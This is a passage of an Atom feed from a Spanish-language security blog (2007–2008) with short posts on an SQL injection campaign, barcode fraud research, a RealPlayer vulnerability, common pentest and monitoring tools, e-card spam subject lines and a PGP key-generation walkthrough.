/&gt;Casi todos los sitios afectados funcionan sobre servidores IIS y MS SQL. Esto parece lógico ya que el extracto SQL del ataque funcionará sólo en servidores MS SQL. En el artículo original recomiendan soluciones temporales como las de instalar un firewall de aplicaciones web o un ‘reverse proxy’, pero ambos parches sólo serán soluciones temporales, así que habrá que estar atentos a posibles incidencias en los servidores.&lt;br /&gt;&lt;br /&gt;Artículo completo &lt;a href="http://www.theinquirer.es/2008/01/10/vulnerabilidad_critica_y_muy_peligrosa_con_la_tecnica_sql_injection.html"&gt;The Inquirer ES&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-6090849326288378986?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/6090849326288378986/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=6090849326288378986&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/6090849326288378986'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/6090849326288378986'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/01/vulnerabilidad-crtica-y-muy-peligrosa.html' title='Vulnerabilidad crítica y muy peligrosa con la técnica “SQL injection”'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-5456162445987724631</id><published>2008-01-07T12:03:00.000-02:00</published><updated>2008-01-07T12:07:04.934-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Los códigos de barras tienen agujeros de seguridad</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.diarioti.com/sisimg/16253b_codigobarras_120.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 144px; height: 138px;" src="http://www.diarioti.com/sisimg/16253b_codigobarras_120.jpg" alt="" border="0" /&gt;&lt;/a&gt;Según investigación, los antiguos y generalizados códigos de barras tienen agujeros de seguridad que pueden ser aprovechados con fines delictivos, concluye investigación.&lt;br /&gt;&lt;br /&gt;A menudo, los delitos informáticos son relacionados con usurpación de identidad, suplantación de instituciones financieras y robos de números de tarjetas de crédito. Sin embargo, también es posible intervenir tecnologías más anticuadas, como los conocidos códigos de barras negras.&lt;br /&gt;&lt;br /&gt;En una conferencia de seguridad realizada en Berlín, el denominado grupo Phenoelit presentó diversos ejemplos que confirman que en muchos casos es posible copiar los códigos de barra originales, y alterarlos para obtener un beneficio económico. Los códigos de barra unidimensionales fueron inventados en la década de 1940, y los primeros lectores de códigos de barras fueron lanzados en la década de 1970. No sorprende entonces que sea posible alterar tales códigos. La tecnología es usada en muchos lugares, especialmente en supermercados y estacionamientox. Por ejemplo, el grupo Phenoelit informó sobre un centro de estacionamiento en Alemania donde era posible obtener estacionamiento gratuito debido a que el pago con código de barras no incorporaba un sistema de comprobación.&lt;br /&gt;&lt;br /&gt;Un sistema similar podría ser usado para alterar los precios en supermercados, con el fin de pagar por ellos un precio inferior al real.&lt;br /&gt;&lt;br /&gt;Artículo completo &lt;a href="http://www.diarioti.com/gate/n.php?id=16253"&gt;DiarioTI&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-5456162445987724631?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/5456162445987724631/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=5456162445987724631&amp;isPopup=true' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/5456162445987724631'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/5456162445987724631'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/01/los-cdigos-de-barras-tienen-agujeros-de.html' title='Los códigos de barras tienen agujeros de seguridad'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-9209047824906349008</id><published>2008-01-06T23:33:00.001-02:00</published><updated>2008-01-06T23:39:01.544-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Herramientas'/><title type='text'>PassPub, el generador de contraseñas</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://passpub.com/images/passpub_logo_400.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px;" src="https://passpub.com/images/passpub_logo_400.jpg" alt="" border="0" /&gt;&lt;/a&gt;Les presento esta herramienta llamado &lt;a href="https://passpub.com/"&gt;&lt;span style="font-weight: bold;"&gt;PassPub&lt;/span&gt;&lt;/a&gt;, un herramienta que nos va a permitir generar Contraseñas seguras de manera muy fácil y sencilla.&lt;br /&gt;&lt;br /&gt;Obviamente ya sabemos que la seguridad de las contraseñas estan acompañadas por el secreto de las mismas y la actualización periódicas.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://passpub.com/"&gt;&lt;span style="font-weight: bold;"&gt;PassPub&lt;/span&gt;&lt;/a&gt; nos permite generar contraseñas de 64, 128 o 256bits para redes inalámbricas, también podemos generar passwords de 6, 8, 10 o 12 caracteres de longitud, combinaciones basadas en la tabla periódica y otras combinaciones.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-9209047824906349008?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/9209047824906349008/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=9209047824906349008&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/9209047824906349008'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/9209047824906349008'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/01/passpub-el-generador-de-contraseas.html' title='PassPub, el generador de contraseñas'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-7147586729259366212</id><published>2008-01-02T10:17:00.000-02:00</published><updated>2008-01-02T10:21:11.793-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Vulnerabilidad en RealPlayer 11 puede ejecutar código</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://x-caleta.com/uploads/posts/1183965016_1s_realplayer11_1.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 200px;" src="http://x-caleta.com/uploads/posts/1183965016_1s_realplayer11_1.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;RealPlayer&lt;/span&gt; es propenso a una vulnerabilidad no especificada del tipo desbordamiento de búfer, que puede permitir a un atacante la ejecución remota de código, o que la aplicación deje de responder.&lt;br /&gt;&lt;br /&gt;El problema, del cuál existe como prueba de concepto una demostración animada, se produce por un error del programa en manejar adecuadamente los límites de cierta información suministrada por el usuario, antes de volcar la misma a un búfer de tamaño inadecuado.&lt;br /&gt;&lt;br /&gt;Si un atacante remoto convence al usuario a abrir un archivo multimedia malicioso, y en el sistema está presente RealPlayer 11, puede lograr la ejecución de un malware o cualquier otro programa que desee.&lt;br /&gt;&lt;br /&gt;artículo completo &lt;a href="http://www.vsantivirus.com/vul-realplayer11-010108.htm"&gt;VSAntivirus&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-7147586729259366212?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/7147586729259366212/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=7147586729259366212&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/7147586729259366212'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/7147586729259366212'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/01/vulnerabilidad-en-realplayer-11-puede.html' title='Vulnerabilidad en RealPlayer 11 puede ejecutar código'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-987254490387432399</id><published>2007-12-29T17:00:00.000-03:00</published><updated>2008-12-10T12:33:56.334-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Herramientas'/><title type='text'>Algunas Herramientas para PenTest</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_nams9blykQY/R3apfqWGSNI/AAAAAAAAAB0/YjOwIXkNS54/s1600-h/pentest.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer;" src="http://1.bp.blogspot.com/_nams9blykQY/R3apfqWGSNI/AAAAAAAAAB0/YjOwIXkNS54/s400/pentest.jpg" alt="" id="BLOGGER_PHOTO_ID_5149489585352755410" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:Arial;font-size:85%;"  &gt;&lt;b&gt;Nessus&lt;br /&gt;&lt;/b&gt; Auditor de Seguridad Remoto. El cliente "The Nessus Security    Scanner" es una herramienta de auditoría de seguridad. Hace posible    evaluar módulos de seguridad intentando encontrar puntos vulnerables que    deberían ser reparados. Está compuesto por dos partes: un servidor, y un    cliente. El servidor/daemon, "nessusd" se encarga de los ataques,    mientras que el cliente, "nessus", se ocupa del usuario por medio de una    linda interfaz para X11/GTK+. Este paquete contiene el cliente para GTK+1.2,    que además existe en otras formas y para otras platarformas.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;   &lt;span style=";font-family:Arial;font-size:85%;"  &gt;&lt;b&gt;      Netcat&lt;br /&gt;&lt;/b&gt;Una navaja multiuso para TCP/IP. Una utilidad simple para Unix que    lee y escribe datos a través de conexiones de red usando los protocolos    TCP o UDP. Está diseñada para ser una utilidad del tipo "back-end"    confiable que pueda ser usada directamente o fácilmente manejada por    otros programas y scripts. Al mismo tiempo, es una herramienta rica en    características útil para depurar (debug) y explorar, ya que puede crear    casi cualquier tipo de conexión que puedas necesitar y tiene muchas    características incluídas.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Tcpdump &lt;/b&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="display: block;" id="formatbar_Buttons"&gt;&lt;span class="on" style="display: block;" id="formatbar_CreateLink" title="Vínculo" onmouseover="ButtonHoverOn(this);" onmouseout="ButtonHoverOff(this);" onmouseup="" onmousedown="CheckFormatting(event);FormatbarButton('richeditorframe', this, 8);ButtonMouseDown(this);"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=";font-family:Arial;font-size:85%;"  &gt;&lt;b&gt;   &lt;/b&gt;Una poderosa herramienta para el monitoreo y la adquisición de datos    en redes. Este programa te permite volcar (a un archivo, la pantalla,etc.)    el tráfico que presenta una red. Puede ser usado para imprimir los    encabezados de los paquetes en una interfaz de red ("network interface")    que concuerden con una cierta expresión. Se puede usar esta herramienta    para seguir problemas en la red, para detectar "ping attacks" o para    monitorear las actividades de una red. &lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;      &lt;span style=";font-family:Arial;font-size:85%;"  &gt;&lt;b&gt;   Snort&lt;/b&gt;&lt;br /&gt;un Sniffer/logger de paquetes flexible que detecta ataques. Snort está    basado en la biblioteca `libpcap' y puede ser usado como un "sistema de    detección de intrusiones" (IDS) de poco peso. Posee un registro basado    en reglas y puede buscar/identificar contenido además de poder ser usado    para detectar una gran variedad de otros ataques e investigaciones (probes),    como buffer overflows, barridos de puertos indetectables (stealth port    scans), ataques CGI, pruebas de SMB (SMB probes), y mucho más. Otra    característica importante de Snort es la capacidad de alertar en tiempo    real, siendo estas alertas enviadas a syslog, un archivo de alerta    separado o incluso a una computadora con Windows a través de Samba.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Saint&lt;/b&gt;&lt;br /&gt;SAINT (Security Administrator's Integrated Network Tool, o sea,    Herramienta De Red Integrada Del Adminstrador de Seguridad) es una    herramienta de evaluación de seguridad basada en SATAN. Incluye escaneos    _a_través_ de un firewall, chequeos de seguridad actualizados de los    boletines de CERT Y CIAC, 4 niveles de severidad (rojo, amarillo, marrón    y verde) y una interfaz HTML rica en características.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Ethereal&lt;br /&gt;&lt;/b&gt;Ethereal es un analizador de tráfico de redes, o "sniffer" para Unix    y Sistemas operativos del tipo Unix. usa GTK+, &lt;/span&gt;&lt;span style=";font-family:Arial;font-size:85%;"  &gt;una biblioteca de    interfaz gráfica para el usuario (GUI), y libcap, una bliblioteca que    facilita la captura y el filtrado de paquetes.&lt;/span&gt;&lt;span style=";font-family:Arial;font-size:85%;"  &gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;Artículo completo: &lt;a href="http://www.zonagratuita.com/a-cursos/utilidades/50_herramientas_top.htm"&gt;Zona Gratuita&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-987254490387432399?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/987254490387432399/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=987254490387432399&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/987254490387432399'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/987254490387432399'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/algunas-herramientas-para-pentest.html' title='Algunas Herramientas para PenTest'/><author><name>Barnisimo</name><uri>http://www.blogger.com/profile/01972106911791737364</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_nams9blykQY/R3apfqWGSNI/AAAAAAAAAB0/YjOwIXkNS54/s72-c/pentest.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-1552371271639508505</id><published>2007-12-28T00:54:00.000-03:00</published><updated>2007-12-28T00:57:33.283-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Cuidado con las tarjetas de felicitación electrónicas</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.ampacolegioalhambra.org/IMG/jpg/DSCF0464.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 200px;" src="http://www.ampacolegioalhambra.org/IMG/jpg/DSCF0464.jpg" alt="" border="0" /&gt;&lt;/a&gt;Según reporta el &lt;span style="font-weight: bold;"&gt;SANS&lt;/span&gt; &lt;span style="font-style: italic;"&gt;Internet Storm Center&lt;/span&gt;, aumentaron estos días los ataques de spam con enlaces a troyanos que convierten la PC de quienes caen en la trampa de seguir el enlace, en una máquina zombi.&lt;br /&gt;&lt;br /&gt;Los más recientes, incluyen tarjetas de felicitaciones electrónicas, con temas relacionados con el nuevo año.&lt;br /&gt;&lt;br /&gt;Algunos de los asuntos (y textos), utilizados por estos mensajes:&lt;br /&gt;&lt;br /&gt;A fresh new year&lt;br /&gt;As the new year...&lt;br /&gt;As you embrace another new year&lt;br /&gt;Blasting new year&lt;br /&gt;Happy 2008!&lt;br /&gt;Happy New Year to [dirección electrónica]&lt;br /&gt;Happy New Year to You!&lt;br /&gt;Happy New Year!&lt;br /&gt;It's the new Year&lt;br /&gt;Joyous new year&lt;br /&gt;Lots of greetings on the new year&lt;br /&gt;New Hope and New Beginnings&lt;br /&gt;New Year Ecard&lt;br /&gt;New Year Postcard&lt;br /&gt;New Year wishes for You&lt;br /&gt;Opportunities for the new year&lt;br /&gt;Wishes for the new year&lt;br /&gt;&lt;br /&gt;Los equipos infectados se convierten en auténticos zombis, recibiendo y ejecutando ordenes, recibidas a través de una o varias redes de computadoras también infectadas, que forman parte de extensas botnets (redes de equipos autómatas, controlados por uno o más atacantes).&lt;br /&gt;&lt;br /&gt;No abrir adjuntos no solicitados, ni hacer clic en enlaces de mensajes que llegan en forma de spam, son precauciones mínimas que nunca debemos olvidar.&lt;br /&gt;&lt;br /&gt;Artículo completo &lt;a href="http://seguinfo.blogspot.com/2007/12/cuidado-con-las-tarjetas-de-felicitacin.html"&gt;Segu-Info&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-1552371271639508505?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/1552371271639508505/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=1552371271639508505&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/1552371271639508505'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/1552371271639508505'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/cuidado-con-las-tarjetas-de-felicitacin.html' title='Cuidado con las tarjetas de felicitación electrónicas'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-2629568794653990682</id><published>2007-12-26T10:53:00.000-03:00</published><updated>2007-12-26T15:33:04.729-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Reality Show de Seguridad Informática</title><content type='html'>El 24 de Diciembre se estrenó en Estados Unidos un reality show sobre seguridad informática llamado “Tiger Team”.&lt;br /&gt;&lt;br /&gt;En este programa podremos ver como 3 empleados de Alternative Technology (empresa de seguridad con sede en Colorado), entran en diversas redes corporativas haciendo uso de herramientas como Core Impact e ingeniería social, muestran que tan débil es la seguridad FISICA de dichas corporaciones.&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;object height="373" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/4Be-ZzcXVLw&amp;amp;rel=1&amp;amp;border=1"&gt;&lt;param name="wmode" value="transparent"&gt;&lt;embed src="http://www.youtube.com/v/4Be-ZzcXVLw&amp;amp;rel=1&amp;amp;border=1" type="application/x-shockwave-flash" wmode="transparent" height="373" width="425"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-2629568794653990682?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/2629568794653990682/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=2629568794653990682&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/2629568794653990682'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/2629568794653990682'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/reality-show-de-seguridad-informtica.html' title='Reality Show de Seguridad Informática'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-2580893081926395549</id><published>2007-12-23T02:45:00.000-03:00</published><updated>2007-12-23T02:51:28.870-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Criptografía'/><title type='text'>Creación de un par de Claves en PGP</title><content type='html'>En los siguientes pasos vamos a comenzar a utilizar esta Herramienta PGP y en esta opotunidad para crear un par de Claves (Pública/Privada). Para realizar lo siguiente debemos hacer:&lt;br /&gt;&lt;br /&gt;&lt;code style="font-weight: bold;"&gt;pgp -kg&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;el argumento -kg le indica a la aplicación que deseamos crear el par de Claver (Pública/Privada).&lt;br /&gt;A partir de este punto nos va a realizar una series de preguntas:&lt;br /&gt;&lt;code&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Por favor seleccione tipo de clave deseado:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; (1) DSA y ElGamal (por defecto)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; (2) DSA (sólo firmar)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; (5) RSA (sólo firmar)&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;para realizar las pruebas escojemos el (1)&lt;br /&gt;&lt;br /&gt;La siguiente pregunta nos dice:&lt;br /&gt;&lt;code&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;El par de claves DSA tendrá 1024 bits.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;las claves ELG-E pueden tener entre 1024 y 4096 bits de longitud.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;¿De qué tamaño quiere la clave? (2048)&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;aca debemos aclarar que mientras mas grande sea la clave, más seguridad obtendremos a cambio de una pequeña penalización en velocidad. Para este ejemplo escojamos el valor (2048).&lt;br /&gt;&lt;br /&gt;Pasando a la siguiente pregunta tenemos:&lt;br /&gt;&lt;code&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Por favor, especifique el período de validez de la clave.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;       0 = la clave nunca caduca&lt;/span&gt;&lt;br /&gt;  &lt;n style="font-weight: bold;"&gt;  = la clave caduca en n días&lt;br /&gt; &lt;n&gt;w = la clave caduca en n semanas&lt;br /&gt; &lt;n&gt;m = la clave caduca en n meses&lt;br /&gt; &lt;n&gt;y = la clave caduca en n años&lt;br /&gt;¿Validez de la clave (0)?&lt;/n&gt;&lt;/n&gt;&lt;/n&gt;&lt;/n&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;A modo de demostración en esta oportunidad escojeremos la opción (0), pero es importante intentar probar todos los parámetros, ya que los mismos no serán útiles para la implementación de políticas de seguridad.&lt;br /&gt;&lt;br /&gt;Ahora llega el momento de indicarle datos propios del usuario, quizas algún comentario y su dirección de correo electronico:&lt;br /&gt;&lt;code&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Necesita un identificador de usuario para identificar su clave. El programa&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;construye el identificador a partir del Nombre Real, Comentario y Dirección&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;de Correo Electrónico de esta forma:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; "Heinrich Heine (Der Dichter) heinrichh@duesseldorf.de"&lt;/span&gt;&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;Una ves ingresado cada uno de estos parámetros, nos mostrará por salida los datos ingresados y solo nos bastará con aceptar los mismos en caso que estén bien ingresados, es posible modificar c/u de estos campos.&lt;br /&gt;&lt;br /&gt;Por último se nos pide una contraseña para proteger nuestra Clave Privada, elige como contraseña una frase que te sea fácil de recordar. Esto se hace para proteger tu Clave Privada en caso de que te la roben, ya que no se puede usar sin introducir primero esta contraseña.&lt;br /&gt;&lt;br /&gt;A continuación deberemos pulsar aleatoriamente varias teclas con el fin de ayudar a crear una secuencia de bits que el programa usará para generar números aleatorios. El programa se basa en el intervalo de tiempo pasado entre cada una de nuestras pulsaciones para crear esta secuencia de bits.&lt;br /&gt;&lt;br /&gt;De este modo nos queda generado el par de Claves para el usuario ingresado, con el siguiente comando podemos listar todas las cuentas que tengamos:&lt;br /&gt;&lt;br /&gt;&lt;code style="font-weight: bold;"&gt;pgp -kv&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-2580893081926395549?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/2580893081926395549/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=2580893081926395549&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/2580893081926395549'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/2580893081926395549'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/creacin-de-un-par-de-claves.html' title='Creación de un par de Claves en PGP'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 